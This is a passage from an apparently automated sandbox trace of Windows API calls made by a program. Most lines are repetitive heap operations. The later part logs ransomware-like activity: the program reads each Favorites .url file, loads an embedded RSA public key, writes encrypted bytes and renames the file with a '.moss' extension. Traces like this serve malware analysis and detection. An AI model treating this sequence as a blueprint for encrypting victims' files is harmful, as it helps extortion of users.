hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.483] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0171.483] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0171.483] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.484] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.484] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.484] PathFindFileNameW (pszPath="") returned="" [0171.484] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.485] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.485] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0171.485] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0171.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.489] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.489] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.492] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.492] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.493] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.493] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.494] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.494] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.494] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.494] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.494] GetLastError () returned 0x0 [0171.494] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.494] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.494] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.494] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.494] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.494] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.494] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.494] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.495] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.495] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.495] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.495] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.moss")) returned 1 [0171.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.496] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3280 | out: hHeap=0xcd0000) returned 1 [0171.497] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0171.497] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0171.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.498] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.498] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.501] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.501] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.502] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.502] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.502] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.503] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.503] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.503] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.504] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.504] GetLastError () returned 0x0 [0171.504] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.504] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.504] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.504] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.504] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.504] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.504] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.504] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.505] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: 